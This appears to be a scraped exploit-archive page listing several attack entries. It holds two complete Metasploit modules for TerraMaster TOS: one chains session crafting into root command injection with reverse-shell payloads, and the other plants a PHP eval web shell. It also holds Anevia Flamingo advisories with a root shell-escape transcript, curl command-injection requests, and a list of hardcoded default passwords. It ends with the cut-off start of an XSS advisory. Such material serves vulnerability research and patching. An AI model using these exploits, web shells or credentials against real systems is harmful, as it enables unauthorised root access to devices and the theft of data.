This Metasploit module is a Terramaster chained exploit that performs session crafting to achieve escalated privileges that allows an attacker to access vulnerable code execution flaws. TOS versions 4.2.15 and below are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'digest/md5'require 'time'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TerraMaster TOS 4.2.15 or lower - RCE chain from unauthenticated to root via session crafting.',        'Description' => %q{          Terramaster chained exploit that performs session crafting to achieve escalated privileges that allows          an attacker to access vulnerable code execution flaws. TOS versions 4.2.15 and below are affected.          CVE-2021-45839 is exploited to obtain the first administrator's hash set up on the system as well as other          information such as MAC address, by performing a request to the `/module/api.php?mobile/webNasIPS` endpoint.          This information is used to craft an unauthenticated admin session using CVE-2021-45841 where an attacker          can self-sign session cookies by knowing the target MAC address and the user password hash.          Guest users (disabled by default) can be abused using a null/empty hash and allow an unauthenticated attacker          to login as guest.          Finally, CVE-2021-45837 is exploited to execute arbitrary commands as root by sending a specifically crafted          input to vulnerable endpoint `/tos/index.php?app/del`.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'n0tme' # Discovery and POC        ],        'References' => [          ['CVE', '2021-45837'],          ['CVE', '2021-45839'],          ['CVE', '2021-45841'],          ['URL', 'https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/'],          ['PACKETSTORM', '165399'],          ['URL', 'https://attackerkb.com/topics/8rNXrrjQNy/cve-2021-45837']        ],        'DisclosureDate' => '2021-12-24',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['bourne', 'wget', 'curl'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8181,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])    ])  end  def get_data    # Initialise instance variable data to store the leaked data    @data = {}    # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`.    # CVE-2021-458439    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),      'headers' => {        'User-Agent' => 'TNAS',        'User-Device' => 'TNAS'      }    })    if res && res.code == 200 && res.body.include?('webNasIPS successful')      # Parse the JSON response and get the data such as admin password hash and MAC address      res_json = res.get_json_document      unless res_json.blank?        @data['password'] = res_json['data'].split('PWD:')[1].split("\n")[0].strip        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip        @data['key'] = @data['mac'][6..11] # last three MAC address entries        @data['timestamp'] = Time.new.to_i.to_s        # derive signature        @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])      end    end  end  def tos_encrypt_str(key, str_to_encrypt)    id = key + str_to_encrypt    return Digest::MD5.hexdigest(id.encode('utf-8'))  end  def get_headers    {      'User-Agent' => 'TNAS',      'User-Device' => 'TNAS',      'Authorization' => @data['password'],      'Signature' => @data['signature'],      'Timestamp' => @data['timestamp']    }  end  def download_admin_users    # Initialise instance variable admin_users to store the admin users from /etc/group    @admin_users = []    # Download /etc/group information to find all the admin users belonging to the group admin.    # Using endpoint module/api.php?mobile/fileDownload as user guest allows to download the file without authentication.    # CVE-2021-45841    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/fileDownload'),      'ctype' => 'application/x-www-form-urlencoded',      'cookie' => "kod_name=guest; kod_token=#{tos_encrypt_str(@data['key'], '')}",      'headers' => get_headers,      'vars_post' => {        'path' => '/etc/group'      }    })    # get the admin users from /etc/group    if res && res.code == 200 && res.body.include?('admin')      res.body.each_line do |line|        next if line.empty?        field = line.split(':')        next unless field[0] == 'admin'        @admin_users = field[3].strip.split(',')        break      end    end  end  def get_session    # Use session crafting to iterate thru the list of admin users to gain a session.    # We will send two request per admin user. First request is a dummy request to obtain the session-id.    # This session-id will be used to send the second request that will execute the echo command with marker.    # if the response contains the marker, then the session has been successfully established.    # CVE-2021-45837    session = false    marker = Rex::Text.rand_text_alphanumeric(8..16)    for admin in @admin_users      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'tos', "index.php?app/del&id=0&name=;echo${IFS}#{marker};%23"),        'ctype' => 'application/x-www-form-urlencoded',        'keep_cookies' => true,        'cookie' => "kod_name=#{admin}; kod_token=#{tos_encrypt_str(@data['key'], @data['password'])}",        'headers' => get_headers      })      if res && res.code == 302 && !res.body.include?(marker.to_s)        # Send second request to establish a session and break from the loop if true.        res = send_request_cgi({          'method' => 'GET',          'uri' => normalize_uri(target_uri.path, 'tos', "index.php?app/del&id=0&name=;echo${IFS}#{marker};%23"),          'ctype' => 'application/x-www-form-urlencoded',          'keep_cookies' => true,          'headers' => get_headers        })      end      next unless res && res.code == 200 && res.body.include?(marker.to_s)      session = true      break    end    session  end  def get_terramaster_info    # get Terramaster CPU architecture (X64 or ARM64) and TOS version    @terramaster = {}    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')    })    if res && res.body && res.code == 200      # get the version information from the request response like below:      # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/>      return if res.body.match(/ver=.+?"/).nil?      version = res.body.match(/ver=.+?"/)[0]      # check if architecture is ARM64 or X64      if version.match(/_A/)        @terramaster['cpu_arch'] = 'ARM64'      elsif version.match(/_S/) || version.match(/_Q/)        @terramaster['cpu_arch'] = 'X64'      else        @terramaster['cpu_arch'] = 'UNKNOWN'      end      # strip TOS version number and remove trailing double quote.      @terramaster['tos_version'] = version.split('.0_')[1].chop    end  end  def execute_command(cmd, _opts = {})    # Execute payload using vulnerable endpoint `index.php?app/del&id=0&name=;<PAYLOAD>;%23`    # CVE-2021-45837    payload = CGI.escape(cmd)    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'tos', "index.php?app/del&id=0&name=;#{payload};%23"),      'ctype' => 'application/x-www-form-urlencoded',      'keep_cookies' => true,      'headers' => get_headers    })  end  def check    get_terramaster_info    return CheckCode::Safe if @terramaster.empty?    if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.15')      return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")    end    CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")  end  def exploit    # get the leaked data    get_data    fail_with(Failure::BadConfig, 'Can not retrieve the leaked data.') if @data.empty?    download_admin_users    fail_with(Failure::BadConfig, 'Can not retrieve the list of admin users.') if @admin_users.empty?    fail_with(Failure::NoAccess, 'Can not establish an admin session.') unless get_session    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager(linemax: 65536)    end  endend

TerraMaster TOS 4.2.15 Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS versions 4.2.06 and below via shell metacharacters in the Event parameter at vulnerable endpoint include/makecvs.php during CSV creation. Any unauthenticated user can therefore execute commands on the system under the same privileges as the web application, which typically runs under root at the TerraMaster Operating System.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TerraMaster TOS 4.2.06 or lower - Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an unauthenticated remote code-execution vulnerability in TerraMaster TOS 4.2.06          and lower via shell metacharacters in the Event parameter at vulnerable endpoint `include/makecvs.php`          during CSV creation.          Any unauthenticated user can therefore execute commands on the system under the same privileges as the          web application, which typically runs under root at the TerraMaster Operating System.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'IHTeam' # Discovery        ],        'References' => [          ['CVE', '2020-35665'],          ['CVE', '2020-28188'],          ['PACKETSTORM', '160685'],          ['PACKETSTORM', '160687'],          ['URL', 'https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/'],          ['URL', 'https://attackerkb.com/topics/lXY4yjOvwx/cve-2020-35665']        ],        'DisclosureDate' => '2020-12-12',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86, ARCH_AARCH64],        'Privileged' => false,        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['printf', 'echo', 'bourne', 'wget', 'curl'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8181,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/']),      OptString.new('WEBSHELL', [false, 'Web shell name with extension .php. Name will be randomly generated if left unset.', nil]),      OptEnum.new('COMMAND',                  [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])    ])  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : datastore['WEBSHELL'].to_s)    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    # Upload PHP payload    webshell = if target['Type'] == :php                 "http|echo \"<?php @eval(base64_decode(\\$_POST[\'#{@post_param}\']));?>\" > #{@webshell_name}||"               else                 "http|echo \"<?=\\$_GET[\'#{@get_param}\'](base64_decode(\\$_POST[\'#{@post_param}\']));?>\" > #{@webshell_name}||"               end    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'include', 'makecvs.php'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        'Event' => webshell.to_s      }    })  end  def get_terramaster_info    # get Terramaster CPU architecture (X64 or ARM64) and TOS version    @terramaster = {}    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')    })    if res && res.body && res.code == 200      # get the version information from the request response like below:      # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/>      return if res.body.match(/ver=.+?"/).nil?      version = res.body.match(/ver=.+?"/)[0]      # check if architecture is ARM64 or X64      if version.match(/_A/)        @terramaster['cpu_arch'] = 'ARM64'      elsif version.match(/_S/) || version.match(/_Q/)        @terramaster['cpu_arch'] = 'X64'      else        @terramaster['cpu_arch'] = 'UNKNOWN'      end      # strip TOS version number and remove trailing double quote.      @terramaster['tos_version'] = version.split('.0_')[1].chop    end  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'include', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    php_cmd_function = datastore['COMMAND']    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'include', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        @get_param => php_cmd_function      },      'vars_post' => {        @post_param => payload      }    })  end  def check    get_terramaster_info    return CheckCode::Safe if @terramaster.empty?    if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.06')      return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")    else      return CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")    end  end  def exploit    res = upload_webshell    fail_with(Failure::UnexpectedReply, 'Web shell upload error.') if res.nil? || (res.code != 200)    register_file_for_cleanup(@webshell_name.to_s)    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager(linemax: 65536)    end  endend

TerraMaster TOS 4.2.06 Remote Code Execution

Anevia Flamingo XL version 3.2.9 suffers from an SSH sandbox escape via the use of traceroute. A remote attacker can breakout of the restricted environment and have full root access to the device.

  
Anevia Flamingo XL 3.2.9 (login) Remote Root Jailbreak

Vendor: Ateme  
Product web page: https://www.ateme.com  
Affected version: 3.2.9  
                  Hardware revision 1.0  
                  SoapLive 2.0.3

Summary: Flamingo XL, a new modular and high-density IPTV head-end  
product for hospitality and corporate markets. Flamingo XL captures  
live TV and radio content from satellite, cable, digital terrestrial  
and analog sources before streaming it over IP networks to STBs, PCs  
or other IP-connected devices. The Flamingo XL is based upon a modular  
4U rack hardware platform that allows hospitality and corporate video  
service providers to deliver a mix of channels from various sources  
over internal IP networks.

Desc: Once the admin establishes a secure shell session, she gets  
dropped into a sandboxed environment using the login binary that  
allows specific set of commands. One of those commands that can be  
exploited to escape the jailed shell is traceroute. A remote attacker  
can breakout of the restricted environment and have full root access  
to the device.

Tested on: GNU/Linux 3.1.4 (x86_64)  
           Apache/2.2.15 (Unix)  
           mod_ssl/2.2.15  
           OpenSSL/0.9.8g  
           DAV/2  
           PHP/5.3.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2023-5780  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php

13.04.2023

--

$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1  
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.  
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.  
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes  
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.  
Anevia Flamingo XL  
root@192.168.1.1's password:  
Primary-XL> help  
available commands:  
  bonding  
  config  
  date  
  dns  
  enable  
  ethconfig  
  exit  
  exp  
  firewall  
  help  
  hostname  
  http  
  igmpq  
  imp  
  ipconfig  
  license  
  log  
  mail  
  passwd  
  persistent_logs  
  ping  
  reboot  
  reset  
  route  
  serial  
  settings  
  sslconfig  
  tcpdump  
  timezone  
  traceroute  
  upgrade  
  uptime  
  version  
  vlanconfig

Primary-XL> tcpdump ;id  
tcpdump: illegal token: ;  
Primary-XL> id  
unknown command id  
Primary-XL> whoami  
unknown command whoami  
Primary-XL> ping ;id  
ping: ;id: Host name lookup failure  
Primary-XL> traceroute ;id  
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary

Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]  
        [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]  
        [-z pausemsecs] host [data size]

trace the route ip packets follow going to "host"  
Options:  
        -F      Set the don't fragment bit  
        -I      Use ICMP ECHO instead of UDP datagrams  
        -l      Display the ttl value of the returned packet  
        -d      Set SO_DEBUG options to socket  
        -n      Print hop addresses numerically rather than symbolically  
        -r      Bypass the normal routing tables and send directly to a host  
        -v      Verbose output  
        -m max_ttl      Set the max time-to-live (max number of hops)  
        -p port#        Set the base UDP port number used in probes  
                (default is 33434)  
        -q nqueries     Set the number of probes per ``ttl'' to nqueries  
                (default is 3)  
        -s src_addr     Use the following IP address as the source address  
        -t tos  Set the type-of-service in probe packets to the following value  
                (default 0)  
        -w wait Set the time (in seconds) to wait for a response to a probe  
                (default 3 sec)  
        -g      Specify a loose source route gateway (8 maximum)

uid=0(root) gid=0(root) groups=0(root)  
Primary-XL> version  
Software Revision: Anevia Flamingo XL v3.2.9  
Hardware Revision: 1.0  
(c) Anevia 2003-2012  
Primary-XL> traceroute ;sh  
...  
...  
whoami  
root  
id  
uid=0(root) gid=0(root) groups=0(root)  
ls -al  
drwxr-xr-x   19 root     root         1024 Oct  3  2022 .  
drwxr-xr-x   19 root     root         1024 Oct  3  2022 ..  
drwxr-xr-x    2 root     root         1024 Oct 21  2013 bin  
drwxrwxrwt    2 root     root           40 Oct  3  2022 cores  
drwxr-xr-x   13 root     root        27648 May 22 00:53 dev  
drwxr-xr-x    3 root     root         1024 Oct 21  2013 emul  
drwxr-xr-x   48 1000     1000         3072 Oct  3  2022 etc  
drwxr-xr-x    3 root     root         1024 Oct  3  2022 home  
drwxr-xr-x   11 root     root         3072 Oct 21  2013 lib  
lrwxrwxrwx    1 root     root           20 Oct 21  2013 lib32 -> /emul/ia32-linux/lib  
lrwxrwxrwx    1 root     root            3 Oct 21  2013 lib64 -> lib  
drwx------    2 root     root        12288 Oct 21  2013 lost+found  
drwxr-xr-x    4 root     root         1024 Oct 21  2013 mnt  
drwxrwxrwt    2 root     root           80 May 22 00:45 php_sessions  
dr-xr-xr-x  177 root     root            0 Oct  3  2022 proc  
drwxr-xr-x    4 root     root         1024 Oct 21  2013 root  
drwxr-xr-x    2 root     root         2048 Oct 21  2013 sbin  
drwxr-xr-x   12 root     root            0 Oct  3  2022 sys  
drwxrwxrwt   26 root     root         1140 May 22 01:06 tmp  
drwxr-xr-x   10 1000     1000         1024 Oct 21  2013 usr  
drwxr-xr-x   14 root     root         1024 Oct 21  2013 var

ls /var/www/admin  
_img                           configuration.php              log_securemedia.php            stream_dump.php  
_lang                          cores_and_logs_management.php  login.php                      stream_services  
_lib                           dataminer_handshake.php        logout.php                     streaming.php  
_style                         dvbt.php                       logs.php                       support.php  
about.php                      dvbt_scan.php                  main.php                       template  
ajax                           export.php                     manager.php                    time.php  
alarm.php                      fileprogress.php               network.php                    toto.ts  
alarm_view.php                 firewall.php                   pear                           upload_helper.php  
authentication.php             get_config                     power.php                      uptime.php  
bridges.php                    get_enquiry_pending.php        read_settings.php              usbloader.php  
cam.php                        get_upgrade_error.php          receive_helper.php             version.php  
channel.php                    heartbeat.php                  rescrambling                   webradio.php  
channel_xl_list.php            include                        rescrambling.php               webtv  
check_state                    input.php                      resilience                     webtv.php  
class                          js                             resilience.php                 xmltv.php  
common                         license.php                    restart_service.php  
config_snmp.php                log.php                        set_oem.php

python -c 'import pty; pty.spawn("/bin/bash")'  
root@Primary-XL:/# cd /usr/local/bin  
root@Primary-XL:/usr/local/bin# ls -al login  
-rwxr-xr-x    1 root     root        35896 Feb 21  2012 login  
root@Primary-XL:/usr/local/bin# cd ..  
root@Primary-XL:/usr/local# ls commands/  
bonding          firewall         mail             timezone  
config           help             passwd           traceroute  
date             hostname         persistent_logs  upgrade  
dbg-serial       http             ping             uptime  
dbg-set-oem      igmpq            route            version  
dbg-updates-log  imp              serial           vlanconfig  
dns              ipconfig         settings  
ethconfig        license          sslconfig  
exp              log              tcpdump  
root@Primary-XL:/usr/local# exit  
exit  
Primary-XL> enable  
password:  
Primary-XL# ;]

Anevia Flamingo XL 3.2.9 Remote Root Jailbreak

Anevia Flamingo XL version 3.6.20 suffers from an authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges.

    Anevia Flamingo XL 3.6.20 Authenticated Root Remote Code ExecutionVendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.6.20, 3.2.9                  Hardware revision 1.1, 1.0                  SoapLive 2.4.1, 2.0.3                  SoapSystem 1.3.1Summary: Flamingo XL, a new modular and high-density IPTV head-endproduct for hospitality and corporate markets. Flamingo XL captureslive TV and radio content from satellite, cable, digital terrestrialand analog sources before streaming it over IP networks to STBs, PCsor other IP-connected devices. The Flamingo XL is based upon a modular4U rack hardware platform that allows hospitality and corporate videoservice providers to deliver a mix of channels from various sourcesover internal IP networks.Desc: The affected device suffers from authenticated remote codeexecution vulnerability. A remote attacker can exploit this issueand execute arbitrary system commands granting her system accesswith root privileges.Tested on: GNU/Linux 3.1.4 (x86_64)           Apache/2.2.15 (Unix)           mod_ssl/2.2.15           OpenSSL/0.9.8g           DAV/2           PHP/5.3.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5779Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php13.04.2023--> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 192.168.1.1:80...* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)> POST /admin/time.php HTTP/1.1> Host: 192.168.1.1> User-Agent: curl/8.0.1> Accept: */*> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4> Content-Length: 32> Content-Type: application/x-www-form-urlencoded>} [32 bytes data]100    32    0     0  100    32      0     25  0:00:01  0:00:01 --:--:--    25< HTTP/1.1 302 Found< Date: Thu, 13 Apr 2023 23:54:15 GMT< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6< X-Powered-By: PHP/5.3.6< Expires: Thu, 19 Nov 1981 08:52:00 GMT< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0< Pragma: no-cache* Please rewind output before next send< Location: /admin/time.php< Transfer-Encoding: chunked< Content-Type: text/html<* Ignoring the response-body{ [5 bytes data]100    32    0     0  100    32      0     19  0:00:01  0:00:01 --:--:--    19* Connection #0 to host 192.168.1.1 left intact* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'* Switch from POST to GET* Found bundle for host: 0x1de6c6321b0 [serially]* Re-using existing connection #0 with host 192.168.1.1> POST /admin/time.php HTTP/1.1> Host: 192.168.1.1> User-Agent: curl/8.0.1> Accept: */*> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4>< HTTP/1.1 200 OK< Date: Thu, 13 Apr 2023 23:54:17 GMT< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6< X-Powered-By: PHP/5.3.6< Expires: Thu, 19 Nov 1981 08:52:00 GMT< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0< Pragma: no-cache< Transfer-Encoding: chunked< Content-Type: text/html<{ [13853 bytes data]14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br />    <----------------------<<14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br />    <----------------------<<100 33896    0 33896    0     0  14891      0 --:--:--  0:00:02 --:--:--   99k* Connection #0 to host 192.168.1.1 left intact

Anevia Flamingo XL 3.6.20 Authenticated Root Remote Code Execution

Anevia Flamingo XS version 3.6.5 suffers from an authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges.

    Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code ExecutionVendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.6.5                  Hardware revision: 1.1                  SoapLive 2.4.0                  SoapSystem 1.3.1Summary: Flamingo XL, a new modular and high-density IPTV head-endproduct for hospitality and corporate markets. Flamingo XL captureslive TV and radio content from satellite, cable, digital terrestrialand analog sources before streaming it over IP networks to STBs, PCsor other IP-connected devices. The Flamingo XL is based upon a modular4U rack hardware platform that allows hospitality and corporate videoservice providers to deliver a mix of channels from various sourcesover internal IP networks.Desc: The affected device suffers from authenticated remote codeexecution vulnerability. A remote attacker can exploit this issueand execute arbitrary system commands granting her system accesswith root privileges.Tested on: GNU/Linux 3.14.29 (x86_64)           Apache/2.2.22 (Debian)           PHP/5.6.0-0anevia2Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5778Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php13.04.2023--$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data        <td>uid=33(www-data)</td>          <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>        <td>gid=33(www-data)</td>          <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>        <td>groups=33(www-data),6(disk),25(floppy)</td>          <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>---$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root        <td>uid=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>        <td>gid=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>        <td>groups=0(root)</td>          <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>

Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution

Anevia Flamingo XL/XS versions 3.6.20 and 3.2.9 have a weak set of default and hardcoded administrative credentials that can be easily guessed in remote password attacks and gain full control of the system.

    Anevia Flamingo XL/XS 3.6.x Default/Hard-coded CredentialsVendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.6.20, 3.2.9                  Hardware revision 1.1, 1.0                  SoapLive 2.4.1, 2.0.3                  SoapSystem 1.3.1Summary: Flamingo XL, a new modular and high-density IPTV head-endproduct for hospitality and corporate markets. Flamingo XL captureslive TV and radio content from satellite, cable, digital terrestrialand analog sources before streaming it over IP networks to STBs, PCsor other IP-connected devices. The Flamingo XL is based upon a modular4U rack hardware platform that allows hospitality and corporate videoservice providers to deliver a mix of channels from various sourcesover internal IP networks.Desc: The device uses a weak set of default and hard-coded administrativecredentials that can be easily guessed in remote password attacks andgain full control of the system.Tested on: GNU/Linux 3.14.29 (x86_64)           Apache/2.2.22 (Debian)           PHP/5.6.0Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5777Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5777.php13.04.2023--SSH: root:aneviaSSH: enable:parisWEB: admin:parisWEB: monitor:aneviaOEM: monitor:aneviaOEM: monitor:telesteOEM: monitor:envivioOEM: monitor:blankom

Anevia Flamingo XL/XS 3.6.x Default / Hardcoded Credentials 

OmniCart version 3.4.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/32794/ - Pixobit Solutions                  ││  Vendor   : OmniCart - https://omnicartshop.com/                                       ││  Software : OmniCart 3.4.0                                                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: 